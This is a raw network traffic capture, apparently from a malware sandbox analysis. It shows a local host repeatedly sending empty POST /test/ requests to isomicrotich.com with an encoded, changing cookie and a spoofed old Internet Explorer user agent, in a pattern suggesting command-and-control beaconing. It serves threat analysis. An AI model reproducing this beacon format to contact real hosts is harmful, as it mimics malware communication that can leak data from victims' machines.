                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:00 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KGeRGHDLuvjZPYiBNdWXjh1eRl7MXhiet3L1rqn3cvOeLQLqLnXdrcdu%2FGnFk3TXFs0XawtGcf%2F8VWGD7xiLg95QXVtvFY3gNMvgk%2BGsY%2FiEuH0H5CoARsTd1SsX0MgbOKc9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a987d214399-EWR
2024-10-03 18:48:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.2.7 | 62391 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:01 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:01 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SfUYnmZyqldtmEEyouXGpsHYLO1p0pfH3m9lOA18S6wb1%2BeXKtYfwqZV%2FLhVfC5uQhu0LAhzbAVPcPucNxC8hi6t7AqLA7b1isUiPQHQEwbIZ3pZOgrHB2jPq5aeHltPF0Uh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a9f382a4376-EWR
2024-10-03 18:48:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.7 | 62393 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:02 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:02 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3dbaOJT%2FBKvJrXbj9DniDxDz1qzEuEjeM1wzBDw7%2FeRr3Igb%2FymXKRzuW2945t0V7ZFISY90BsctRPwaywvTM5YHl7kBTExrd5W3SkDANzn6EEIRLmRoXd9%2BjRXec%2FDlkvF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1aa5bc3843ca-EWR
2024-10-03 18:48:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.7 | 62394 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:03 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:04 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYS0tiAfEHiOiFtP%2FUdEdWRZsN%2BccVG4e5Au%2B0ti6OaUkSQv9C4bJXlxbDMXj6RG6%2B9DmMPeLN5A2wOnFc98BUzVJOwlm%2FuGKZ7UEgelYCH9V0GD8EzGRjLRxNwgLV2A0ch9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ab0ae965e62-EWR
2024-10-03 18:48:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.7 | 62395 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:04 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFm6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:05 UTC | 577 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DYXV4Hi1jrTDrY3uaokRrLRXKuGPC7g9v0bQwTctFQTIm2Z%2BaXpNsiGlgduNHA%2BeidVICwVHJt%2F%2Byf7D1eO%2By5nEIE3O9Znpf6JrD02hxZQ9VmrMV5d%2F1oBVn%2F5eOKO%2F2j%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ab72c804388-EWR
2024-10-03 18:48:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.7 | 62396 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:05 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:06 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxstfeRaiG7kP4ifBrSvJj6H55h8vyJ9XYyuNkzd634zNu6P1tbk41GgRTxZmTTmr39s6z5hiqd26WO9tmWUFJB9l%2FcRMW%2BX%2BLMy%2FC%2BLOqDqUkSl5qDl6CbhThmGrAMHZRB3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1abd7cc7436a-EWR
2024-10-03 18:48:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.7 | 62399 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:06 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:07 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:07 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilS9PTbp4O%2B4Hfe%2Bp1xxaHOlYjqdU6T2NpWcGrHcBE5%2FOGJreMbtYy4DG%2BDG33h7IRJt3D4mD7ksbr9LkWfpUdYESpWTCNeRStHDYuglzCZjPUzqoOmMpx8J0ftyu9iD%2FY6A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ac38fb9c443-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                                82 | 192.168.2.7 | 62401 | 188.114.97.3 | 443
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1RBs%2BrVGUwoWOvDmkZjWY%2Fc9Khq%2BsLjrf3fZzygn8GC%2F6M5hEOi0bZphUdJqfz9bKs24ucE0AG0NSnX%2Bhe0agA4WhKuNRCcCNJ2np9Txt4sxPuW4DzejRWEtcPA4TRmsotL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1aca79ef41c1-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                                83 | 192.168.2.7 | 62402 | 188.114.97.3 | 443
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBX%2F5RZ24la0Ed6UA385Xjx7itVPrujtGZuIeCOZNDE4ADi8MeMkDiQnyfXHXC44vBg6TUnWvtYvkS04oTszrod33ovHdcgDKwx46%2BNjgQfNQO9SgZvBSh3xYYfTNSN8fubc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ad14b1403d5-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                                84 | 192.168.2.7 | 62404 | 188.114.97.3 | 443
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC | 561 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:10 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nzd3UOe1QAGxai9LT3T1c5AjLkAkVMyQABZvE2w2AdBbZInrAEDJfLZgmSwOcuyZ0dHoov6t9TcvoBAn4YVm98m6Xr8AuTKFgBDOrkxA3hMFqQavtDDjMHLs%2Fctupsqw6iPC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ad7c9620fa3-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                                85 | 192.168.2.7 | 62407 | 188.114.97.3 | 443
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BWN0vIVbScDfYW9idkl9R6JTMHEqrKy%2B1BOoQWgjWP4LNZGCl8gPuPnUFP2UJXAtOMjUOdFdBRiI%2BD%2FKyx7mcLqJN6r8mZKMdnwAp4kLaCXn1lpImwYHhmb6vsBb87BwluSo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ae06fc57c81-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                                86 | 192.168.2.7 | 62408 | 188.114.97.3 | 443
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 18:48:12 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:12 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bMkf9gVNz4hJ%2BpXdPxyp9zO9lJlhkkMyxltivPVT6TloflDK%2BOp%2FpiJfCWnF7VOLwH3P64Fhq5hL0emjHKDCy4CW4qvMGMs0qINnh4Mw0O8BHMAosJVrP%2BwMuCbmRnHpn4FY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ae6cba643af-EWR
2024-10-03 18:48:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.2.7 | 62409 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:14 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:48:14 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BR0EmrGCKg0nklEhxMXu7eQ%2B3hGBGozzJdTaKecg%2FwlUVOeQTkdwd7a5Aj13O57nlnOuryUWnr0LIZLULQB4AXinT7ehzzNCEcGeUJT5ebS7z9lgyPBHJBKLCp3v3pMW0dRw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1af0ea3e4244-EWR
2024-10-03 18:48:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.7 | 62410 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:48:15 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
